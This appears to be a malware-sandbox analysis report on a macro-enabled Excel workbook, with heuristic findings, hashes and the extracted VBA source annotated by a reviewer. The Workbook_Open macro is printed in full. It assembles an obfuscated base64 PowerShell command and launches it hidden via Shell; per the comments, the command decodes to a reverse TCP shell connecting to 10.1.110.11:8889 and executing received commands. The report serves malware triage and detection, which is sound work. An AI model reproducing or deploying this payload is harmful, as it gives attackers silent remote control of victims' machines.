MALICIOUS
188
Risk Score
Heuristics 5
-
VBA project inside OOXML — medium — 4 related findings — OOXML_VBA — Document contains a VBA project — VBA macros present
-
Potential Shell call in VBA — critical — OLE_VBA_SHELL — Potential Shell call in VBA — Matched line in script:
str = str + "AYwB0ACgAKQA7AAoAfQAKAA==" Shell (str) End Sub -
PowerShell reference in VBA — critical — OLE_VBA_PS — PowerShell reference in VBA — Matched line in script:
Dim str As String str = str + "powershell.exe -nop -w hidden -e VwByAGkAdABlAC0AS" str = str + "ABvAHMAdAAgACIAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwA" -
VBA p-code auto-exec with execution tokens — high — OLE_VBA_PCODE_AUTOEXEC_EXEC — Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where the visible source is unavailable.
-
Workbook_Open macro — low — OLE_VBA_WBOPEN — Workbook_Open macro — Matched line in script:
Attribute VB_Customizable = True Private Sub Workbook_Open() Dim str As String
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 10589 bytes |
SHA-256: 11f06f73523311c961f65152e63fc5227164b52c8ca523d928597d4365c69995
Preview script — First 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
' Module1: a standard code module from the extracted VBA project.
' In this preview it holds only the empty procedure ee() that follows.
Sub ee()
Attribute ee.VB_ProcData.VB_Invoke_Func = " \n14"
' NOTE(review): VB_ProcData.VB_Invoke_Func is the Excel macro-options
' attribute (shortcut key / description shown in the Macro dialog); the
' leading space in " \n14" looks like "no shortcut letter assigned" — confirm.
' The procedure body is empty: running it does nothing, and nothing else in
' this listing calls it. Presumably a recorded-macro leftover or a decoy;
' can't tell from this preview alone.
End Sub
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' ThisWorkbook: the workbook's document module, i.e. where workbook event
' handlers (Workbook_Open etc.) live. The attribute lines above are the
' exporter-emitted header for a document module: VB_Base carries a GUID
' (presumably the base class / type-library id), VB_PredeclaredId and
' VB_Exposed mark the module as a predeclared, exposed instance.
' From a triage standpoint, a document module with a populated Workbook_Open
' is the auto-execution path the OLE_VBA_WBOPEN / AUTOEXEC findings refer to.
' Workbook_Open: the Excel event handler that fires automatically when the
' workbook is opened (with macros enabled). No user interaction is required
' beyond enabling content, which is why the report scores it as auto-exec.
'
' Behaviour visible in this listing:
'   1. A single command line is assembled in `str` by ~150 small string
'      concatenations (likely intended to defeat simple substring matching
'      on the static source — an inference, not something the code states).
'   2. The command is `powershell.exe -nop -w hidden -e <base64>` where
'        -nop       = -NoProfile (skip profile scripts)
'        -w hidden  = -WindowStyle Hidden (no visible console window)
'        -e         = -EncodedCommand (base64 of a UTF-16LE encoded script)
'   3. The result is handed to Shell(), so the Office process becomes the
'      parent of powershell.exe.
'
' NOTE(review): the every-other-"A" pattern in the blob is consistent with
' UTF-16LE text. A partial offline decode appears to yield Write-Host banner
' text ("PowerShell Reverse TCP v3.5", "by Ivan Sincek", a github.com/ivan-sincek/
' powershell-reverse-tcp reference), a Net.Sockets.TcpClient connection to
' 10.1.110.11 port 8889 (an RFC1918 address — probably a lab/internal C2),
' "Backdoor is up and running...", and a read loop that passes received text
' to Invoke-Expression — i.e. an interactive reverse shell. Re-verify by
' decoding the full blob offline before relying on these values.
'
' Detection / response pointers grounded in what is visible here:
'   - Office host (EXCEL.EXE) spawning powershell.exe with -e / -w hidden.
'   - Outbound TCP from the Office or PowerShell process to the decoded
'     host:port; block and hunt for it if the decode above is confirmed.
'   - Hash the artifacts listed in the report (macros.bas, vbaProject_00.bin)
'     for retrospective search.
Private Sub Workbook_Open()
Dim str As String
' --- begin base64 payload assembly (UTF-16LE script for -EncodedCommand) ---
str = str + "powershell.exe -nop -w hidden -e VwByAGkAdABlAC0AS"
str = str + "ABvAHMAdAAgACIAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwA"
str = str + "jACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjA"
str = str + "CMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACM"
str = str + "AIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAI"
str = str + "wAjACMAIgA7AAoAVwByAGkAdABlAC0ASABvAHMAdAAgACIAIwA"
str = str + "gACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgA"
str = str + "CAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACA"
str = str + "AIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAI"
str = str + "AAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACMAIgA7AAoAVwB"
str = str + "yAGkAdABlAC0ASABvAHMAdAAgACIAIwAgACAAIAAgACAAIAAgA"
str = str + "CAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABQAG8"
str = str + "AdwBlAHIAUwBoAGUAbABsACAAUgBlAHYAZQByAHMAZQAgAFQAQ"
str = str + "wBQACAAdgAzAC4ANQAgACAAIAAgACAAIAAgACAAIAAgACAAIAA"
str = str + "gACAAIAAgACAAIAAgACMAIgA7AAoAVwByAGkAdABlAC0ASABvA"
str = str + "HMAdAAgACIAIwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACA"
str = str + "AIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAI"
str = str + "AAgACAAIAAgACAAIAAgACAAIABiAHkAIABJAHYAYQBuACAAUwB"
str = str + "pAG4AYwBlAGsAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgA"
str = str + "CMAIgA7AAoAVwByAGkAdABlAC0ASABvAHMAdAAgACIAIwAgACA"
str = str + "AIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAI"
str = str + "AAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAA"
str = str + "gACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgA"
str = str + "CAAIAAgACAAIAAgACAAIAAgACAAIAAgACMAIgA7AAoAVwByAGk"
str = str + "AdABlAC0ASABvAHMAdAAgACIAIwAgAEcAaQB0AEgAdQBiACAAc"
str = str + "gBlAHAAbwBzAGkAdABvAHIAeQAgAGEAdAAgAGcAaQB0AGgAdQB"
str = str + "iAC4AYwBvAG0ALwBpAHYAYQBuAC0AcwBpAG4AYwBlAGsALwBwA"
str = str + "G8AdwBlAHIAcwBoAGUAbABsAC0AcgBlAHYAZQByAHMAZQAtAHQ"
str = str + "AYwBwAC4AIAAgACMAIgA7AAoAVwByAGkAdABlAC0ASABvAHMAd"
str = str + "AAgACIAIwAgAEYAZQBlAGwAIABmAHIAZQBlACAAdABvACAAZAB"
str = str + "vAG4AYQB0AGUAIABiAGkAdABjAG8AaQBuACAAYQB0ACAAMQBCA"
str = str + "HIAWgBNADYAVAA3AEcAOQBSAE4AOAB2AGIAYQBiAG4AZgBYAHU"
str = str + "ANABNADYATABwAGcAegB0AHEANgBZADEANAAuACAAIAAgACMAI"
str = str + "gA7AAoAVwByAGkAdABlAC0ASABvAHMAdAAgACIAIwAgACAAIAA"
str = str + "gACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgA"
str = str + "CAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACA"
str = str + "AIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAI"
str = str + "AAgACAAIAAgACAAIAAgACAAIAAgACMAIgA7AAoAVwByAGkAdAB"
str = str + "lAC0ASABvAHMAdAAgACIAIwAjACMAIwAjACMAIwAjACMAIwAjA"
str = str + "CMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACM"
str = str + "AIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAI"
str = str + "wAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwA"
str = str + "jACMAIwAjACMAIgA7AAoAJABjAGwAaQBlAG4AdAAgAD0AIAAkA"
str = str + "G4AdQBsAGwAOwAKACQAcwB0AHIAZQBhAG0AIAA9ACAAJABuAHU"
str = str + "AbABsADsACgAkAGIAdQBmAGYAZQByACAAPQAgACQAbgB1AGwAb"
str = str + "AA7AAoAJAB3AHIAaQB0AGUAcgAgAD0AIAAkAG4AdQBsAGwAOwA"
str = str + "KACQAZABhAHQAYQAgAD0AIAAkAG4AdQBsAGwAOwAKACQAcgBlA"
str = str + "HMAdQBsAHQAIAA9ACAAJABuAHUAbABsADsACgB0AHIAeQAgAHs"
str = str + "ACgAJACMAIABjAGgAYQBuAGcAZQAgAHQAaABlACAAaABvAHMAd"
str = str + "AAgAGEAZABkAHIAZQBzAHMAIABhAG4AZAAvAG8AcgAgAHAAbwB"
str = str + "yAHQAIABuAHUAbQBiAGUAcgAgAGEAcwAgAG4AZQBjAGUAcwBzA"
str = str + "GEAcgB5AAoACQAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0"
str = str + "ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFMAbwBjAGsAZQB0AHMAL"
str = str + "gBUAGMAcABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAuADEAMQA"
str = str + "wAC4AMQAxACIALAAgADgAOAA4ADkAKQA7AAoACQAkAHMAdAByA"
str = str + "GUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQ"
str = str + "AcgBlAGEAbQAoACkAOwAKAAkAJABiAHUAZgBmAGUAcgAgAD0AI"
str = str + "ABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAA"
str = str + "xADAAMgA0ADsACgAJACQAZQBuAGMAbwBkAGkAbgBnACAAPQAgA"
str = str + "E4AZQB3AC0ATwBiAGoAZQBjAHQAIABUAGUAeAB0AC4AQQBzAGM"
str = str + "AaQBpAEUAbgBjAG8AZABpAG4AZwA7AAoACQAkAHcAcgBpAHQAZ"
str = str + "QByACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgB"
str = str + "TAHQAcgBlAGEAbQBXAHIAaQB0AGUAcgAoACQAcwB0AHIAZQBhA"
str = str + "G0AKQA7AAoACQAkAHcAcgBpAHQAZQByAC4AQQB1AHQAbwBGAGw"
str = str + "AdQBzAGgAIAA9ACAAJAB0AHIAdQBlADsACgAJAFcAcgBpAHQAZ"
str = str + "QAtAEgAbwBzAHQAIAAiAEIAYQBjAGsAZABvAG8AcgAgAGkAcwA"
str = str + "gAHUAcAAgAGEAbgBkACAAcgB1AG4AbgBpAG4AZwAuAC4ALgAiA"
str = str + "DsACgAJAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAiACIAOwAKAAk"
str = str + "AJABiAHkAdABlAHMAIAA9ACAAMAA7AAoACQBkAG8AIAB7AAoAC"
str = str + "QAJACQAdwByAGkAdABlAHIALgBXAHIAaQB0AGUAKAAiAFAAUwA"
str = str + "+ACIAKQA7AAoACQAJAGQAbwAgAHsACgAJAAkACQAkAGIAeQB0A"
str = str + "GUAcwAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQ"
str = str + "AYgB1AGYAZgBlAHIALAAgADAALAAgACQAYgB1AGYAZgBlAHIAL"
str = str + "gBMAGUAbgBnAHQAaAApADsACgAJAAkACQBpAGYAIAAoACQAYgB"
str = str + "5AHQAZQBzACAALQBnAHQAIAAwACkAIAB7AAoACQAJAAkACQAkA"
str = str + "GQAYQB0AGEAIAA9ACAAJABkAGEAdABhACAAKwAgACQAZQBuAGM"
str = str + "AbwBkAGkAbgBnAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAd"
str = str + "QBmAGYAZQByACwAIAAwACwAIAAkAGIAeQB0AGUAcwApADsACgA"
str = str + "JAAkACQB9AAoACQAJAH0AIAB3AGgAaQBsAGUAIAAoACQAcwB0A"
str = str + "HIAZQBhAG0ALgBEAGEAdABhAEEAdgBhAGkAbABhAGIAbABlACk"
str = str + "AOwAKAAkACQBpAGYAIAAoACQAYgB5AHQAZQBzACAALQBnAHQAI"
str = str + "AAwACkAIAB7AAoACQAJAAkAJABkAGEAdABhACAAPQAgACQAZAB"
str = str + "hAHQAYQAuAFQAcgBpAG0AKAApADsACgAJAAkACQBpAGYAIAAoA"
str = str + "CQAZABhAHQAYQAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwACk"
str = str + "AIAB7AAoACQAJAAkACQB0AHIAeQAgAHsACgAJAAkACQAJAAkAJ"
str = str + "AByAGUAcwB1AGwAdAAgAD0AIABJAG4AdgBvAGsAZQAtAEUAeAB"
str = str + "wAHIAZQBzAHMAaQBvAG4AIAAtAEMAbwBtAG0AYQBuAGQAIAAkA"
str = str + "GQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHI"
str = str + "AaQBuAGcAOwAKAAkACQAJAAkAfQAgAGMAYQB0AGMAaAAgAHsAC"
str = str + "gAJAAkACQAJAAkAJAByAGUAcwB1AGwAdAAgAD0AIAAkAF8ALgB"
str = str + "FAHgAYwBlAHAAdABpAG8AbgAgAHwAIABPAHUAdAAtAFMAdAByA"
str = str + "GkAbgBnADsACgAJAAkACQAJAH0ACgAJAAkACQAJAEMAbABlAGE"
str = str + "AcgAtAFYAYQByAGkAYQBiAGwAZQAgAC0ATgBhAG0AZQAgACIAZ"
str = str + "ABhAHQAYQAiADsACgAJAAkACQAJACQAbABlAG4AZwB0AGgAIAA"
str = str + "9ACAAJAByAGUAcwB1AGwAdAAuAEwAZQBuAGcAdABoADsACgAJA"
str = str + "AkACQAJAGkAZgAgACgAJABsAGUAbgBnAHQAaAAgAC0AZwB0ACA"
str = str + "AMAApACAAewAKAAkACQAJAAkACQAkAGMAbwB1AG4AdAAgAD0AI"
str = str + "AAwADsACgAJAAkACQAJAAkAZABvACAAewAKAAkACQAJAAkACQA"
str = str + "JAGkAZgAgACgAJABsAGUAbgBnAHQAaAAgAC0AZwBlACAAJABiA"
str = str + "HUAZgBmAGUAcgAuAEwAZQBuAGcAdABoACkAIAB7ACAAJABiAHk"
str = str + "AdABlAHMAIAA9ACAAJABiAHUAZgBmAGUAcgAuAEwAZQBuAGcAd"
str = str + "ABoADsAIAB9ACAAZQBsAHMAZQAgAHsAIAAkAGIAeQB0AGUAcwA"
str = str + "gAD0AIAAkAGwAZQBuAGcAdABoADsAIAB9AAoACQAJAAkACQAJA"
str = str + "AkAJAB3AHIAaQB0AGUAcgAuAFcAcgBpAHQAZQAoACQAcgBlAHM"
str = str + "AdQBsAHQALgBzAHUAYgBzAHQAcgBpAG4AZwAoACQAYwBvAHUAb"
str = str + "gB0ACwAIAAkAGIAeQB0AGUAcwApACkAOwAKAAkACQAJAAkACQA"
str = str + "JACQAYwBvAHUAbgB0ACAAKwA9ACAAJABiAHkAdABlAHMAOwAKA"
str = str + "AkACQAJAAkACQAJACQAbABlAG4AZwB0AGgAIAAtAD0AIAAkAGI"
str = str + "AeQB0AGUAcwA7AAoACQAJAAkACQAJAH0AIAB3AGgAaQBsAGUAI"
str = str + "AAoACQAbABlAG4AZwB0AGgAIAAtAGcAdAAgADAAKQA7AAoACQA"
str = str + "JAAkACQAJAEMAbABlAGEAcgAtAFYAYQByAGkAYQBiAGwAZQAgA"
str = str + "C0ATgBhAG0AZQAgACIAcgBlAHMAdQBsAHQAIgA7AAoACQAJAAk"
str = str + "ACQB9AAoACQAJAAkAfQAKAAkACQB9AAoACQB9ACAAdwBoAGkAb"
str = str + "ABlACAAKAAkAGIAeQB0AGUAcwAgAC0AZwB0ACAAMAApADsACgA"
str = str + "JAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAiAEIAYQBjAGsAZABvA"
str = str + "G8AcgAgAHcAaQBsAGwAIABuAG8AdwAgAGUAeABpAHQALgAuAC4"
str = str + "AIgA7AAoAfQAgAGMAYQB0AGMAaAAgAHsACgAJAFcAcgBpAHQAZ"
str = str + "QAtAEgAbwBzAHQAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgA"
str = str + "uAEkAbgBuAGUAcgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzA"
str = str + "HMAYQBnAGUAOwAKAH0AIABmAGkAbgBhAGwAbAB5ACAAewAKAAk"
str = str + "AaQBmACAAKAAkAHcAcgBpAHQAZQByACAALQBuAGUAIAAkAG4Ad"
str = str + "QBsAGwAKQAgAHsACgAJAAkAJAB3AHIAaQB0AGUAcgAuAEMAbAB"
str = str + "vAHMAZQAoACkAOwAKAAkACQAkAHcAcgBpAHQAZQByAC4ARABpA"
str = str + "HMAcABvAHMAZQAoACkAOwAKAAkACQBDAGwAZQBhAHIALQBWAGE"
str = str + "AcgBpAGEAYgBsAGUAIAAtAE4AYQBtAGUAIAAiAHcAcgBpAHQAZ"
str = str + "QByACIAOwAKAAkAfQAKAAkAaQBmACAAKAAkAHMAdAByAGUAYQB"
str = str + "tACAALQBuAGUAIAAkAG4AdQBsAGwAKQAgAHsACgAJAAkAJABzA"
str = str + "HQAcgBlAGEAbQAuAEMAbABvAHMAZQAoACkAOwAKAAkACQAkAHM"
str = str + "AdAByAGUAYQBtAC4ARABpAHMAcABvAHMAZQAoACkAOwAKAAkAC"
str = str + "QBDAGwAZQBhAHIALQBWAGEAcgBpAGEAYgBsAGUAIAAtAE4AYQB"
str = str + "tAGUAIAAiAHMAdAByAGUAYQBtACIAOwAKAAkAfQAKAAkAaQBmA"
str = str + "CAAKAAkAGMAbABpAGUAbgB0ACAALQBuAGUAIAAkAG4AdQBsAGw"
str = str + "AKQAgAHsACgAJAAkAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZ"
str = str + "QAoACkAOwAKAAkACQAkAGMAbABpAGUAbgB0AC4ARABpAHMAcAB"
str = str + "vAHMAZQAoACkAOwAKAAkACQBDAGwAZQBhAHIALQBWAGEAcgBpA"
str = str + "GEAYgBsAGUAIAAtAE4AYQBtAGUAIAAiAGMAbABpAGUAbgB0ACI"
str = str + "AOwAKAAkAfQAKAAkAaQBmACAAKAAkAGIAdQBmAGYAZQByACAAL"
str = str + "QBuAGUAIAAkAG4AdQBsAGwAKQAgAHsACgAJAAkAJABiAHUAZgB"
str = str + "mAGUAcgAuAEMAbABlAGEAcgAoACkAOwAKAAkACQBDAGwAZQBhA"
str = str + "HIALQBWAGEAcgBpAGEAYgBsAGUAIAAtAE4AYQBtAGUAIAAiAGI"
str = str + "AdQBmAGYAZQByACIAOwAKAAkAfQAKAAkAaQBmACAAKAAkAHIAZ"
str = str + "QBzAHUAbAB0ACAALQBuAGUAIAAkAG4AdQBsAGwAKQAgAHsACgA"
str = str + "JAAkAQwBsAGUAYQByAC0AVgBhAHIAaQBhAGIAbABlACAALQBOA"
str = str + "GEAbQBlACAAIgByAGUAcwB1AGwAdAAiADsACgAJAH0ACgAJAGk"
str = str + "AZgAgACgAJABkAGEAdABhACAALQBuAGUAIAAkAG4AdQBsAGwAK"
str = str + "QAgAHsACgAJAAkAQwBsAGUAYQByAC0AVgBhAHIAaQBhAGIAbAB"
str = str + "lACAALQBOAGEAbQBlACAAIgBkAGEAdABhACIAOwAKAAkAfQAKA"
str = str + "AkAWwBTAHkAcwB0AGUAbQAuAEcAQwBdADoAOgBDAG8AbABsAGU"
str = str + "AYwB0ACgAKQA7AAoAfQAKAA=="
' --- end payload assembly; the "==" padding closes the base64 blob ---
' Launches the assembled command line. Shell() is the execution primitive the
' OLE_VBA_SHELL finding matched; the parent of the resulting powershell.exe
' is the Excel process hosting this workbook.
Shell (str)
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Sheet1: the worksheet's document module. Only the exporter's attribute
' header is present in this preview — no procedures, so no behaviour to
' assess here. (Its VB_Base GUID differs from ThisWorkbook's, presumably the
' worksheet rather than workbook base class.)
| vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 49152 bytes |
SHA-256: afce4a1550db80c14dae7cf79b2c82a376a5d192b703fa0e26d539bb03d11b7b